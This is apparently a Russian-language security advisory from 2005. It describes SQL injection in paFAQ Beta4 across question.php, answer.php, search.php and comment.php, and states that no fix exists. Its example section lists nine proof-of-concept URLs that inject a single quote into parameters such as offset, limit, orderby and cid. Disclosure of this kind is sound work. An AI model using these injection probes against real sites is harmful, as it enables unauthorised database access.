Security Lab

SQL-инъекция в paFAQ

Дата публикации:21.02.2005
Всего просмотров:1067
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: paFAQ Beta4

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Уязвимость существует в сценариях 'question.php', 'answer.php', 'search.php', и 'comment.php' из-за некорректной фильтрации некоторых параметров. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды на сервере.

Пример/Эксплоит:

http://[target]/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://[ta rget]/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://[target]/index.php?ac t=Question&id=1&orderby='&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1&id=1&offset='
http://[target]/index.php?act=Search&code=01&search_item='
http: //[target]/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://[target]/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email= 4
http://[target]/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4

URL производителя: http://www.phparena.net/pafaq.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: paFAQ Beta4 Sql Injection